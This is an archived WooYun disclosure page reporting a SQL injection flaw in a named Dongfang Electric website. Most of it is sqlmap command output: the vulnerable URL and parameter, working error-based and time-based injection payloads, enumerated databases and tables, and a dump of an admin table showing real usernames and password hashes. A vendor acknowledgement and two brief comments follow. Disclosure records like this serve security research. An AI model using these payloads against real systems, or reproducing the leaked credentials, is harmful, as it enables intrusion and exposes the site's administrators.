当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042140

漏洞标题:东方电气某站SQL注入漏洞

相关厂商:dongfang.com

漏洞作者: lucky

提交时间:2013-11-06 15:44

修复时间:2013-12-21 15:45

公开时间:2013-12-21 15:45

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-06: 细节已通知厂商并且等待厂商处理中
2013-11-06: 厂商已经确认,细节仅向厂商公开
2013-11-16: 细节向核心白帽子及相关领域专家公开
2013-11-26: 细节向普通白帽子公开
2013-12-06: 细节向实习白帽子公开
2013-12-21: 细节向公众公开

简要描述:

详细说明:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.decfc.dongfang.com/media/media_List.php?NID=1&Language=GB" --dbs
---
Place: GET
Parameter: NID
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: NID=1 AND (SELECT 9454 FROM(SELECT COUNT(*),CONCAT(0x3a76696a3a,(SELECT (CASE WHEN (9454=9454) THEN 1 ELSE 0 END)),0x3a6d77743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&Language=GB
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: NID=1 AND SLEEP(5)&Language=GB
---
available databases [5]:
[*] information_schema
[*] mysql
[*] php_decfinance
[*] php_decfinance_new
[*] test
Database: php_decfinance
[105 tables]
+----------------------+
| bulletin_class_gb |
| bulletin_gb |
| comment_class_gb |
| comment_gb |
| commodity_class_gb |
| commodity_gb |
| counter |
| culture_class_gb |
| culture_gb |
| currency_type_gb |
| dec_oldnews |
| download_class_gb |
| download_gb |
| ent_culture_class_gb |
| ent_culture_gb |
| faddress |
| farea |
| fbrowser |
| finance_class_gb |
| finance_gb |
| fipone |
| fiptwo |
| fmozilla |
| frefer |
| fscreen |
| fsystem |
| fvisit |
| fweburl |
| gb_content_gb |
| gb_style_gb |
| group_class_GB |
| group_class_gb |
| group_gb |
| headlines |
| infolist |
| information_gb |
| ipinfo |
| ipscope |
| job_class_gb |
| job_demand_gb |
| job_exper_gb |
| job_feelback_gb |
| job_gb |
| job_send_gb |
| link_class_gb |
| logistics_class_gb |
| logistics_gb |
| magazine_class_gb |
| magazine_gb |
| mediasound_gb |
| menu_gb |
| navigation_gb |
| news_class_gb |
| news_feel_back_gb |
| news_gb |
| order_info |
| order_item |
| order_payment_gb |
| orders_gb |
| payment_class_gb |
| plat_class_gb |
| plat_gb |
| policy_class_gb |
| policy_gb |
| pro_base_class_gb |
| pro_base_gb |
| procure_feel_back_gb |
| procure_gb |
| product_class_gb |
| product_discount_gb |
| product_gb |
| project_class_gb |
| project_gb |
| recruit_class_gb |
| recruit_gb |
| report_gb |
| second_class_gb |
| second_gb |
| server_class_gb |
| server_gb |
| societyduty_gb |
| statday |
| statmonth |
| statweek |
| statyear |
| sys_admin |
| sys_levels |
| tech_class_gb |
| tech_gb |
| techinno_class_gb |
| techinno_gb |
| technology_class_gb |
| technology_gb |
| third_class_gb |
| third_gb |
| topic_class_gb |
| topic_gb |
| trading_class_gb |
| trading_gb |
| users_gb |
| video_class_gb |
| video_gb |
| visitor |
| voice_class_gb |
| voice_gb |
+----------------------+
Database: php_decfinance
Table: sys_admin
[5 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| AdminName | varchar(20) |
| AdminPwd | varchar(32) |
| IP | varchar(15) |
| Level_List | varchar(200) |
| RealName | varchar(20) |
+------------+--------------+
Database: php_decfinance
Table: sys_admin
[2 entries]
+-----+----------------------------------+----------+------------+------------+
| IP | AdminPwd | RealName | AdminName | Level_List |
+-----+----------------------------------+----------+------------+------------+
| ... | b04cd7043863bdd572008e0d28ba4814 | ddd | admindecfc | 01 |
| ... | b49282adf74297e8e0aac1501119b075 | decfc | decfchgcw | 99 |
+-----+----------------------------------+----------+------------+------------+

漏洞证明:

修复方案:

版权声明:转载请注明来源 lucky@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2013-11-06 15:48

厂商回复:

谢谢通知我们

最新状态:

暂无


漏洞评价:

评论

  1. 2013-11-06 18:06 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    给5rank,也就能拿到1rank

  2. 2013-11-06 20:11 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

    @浩天 这也被你知道了!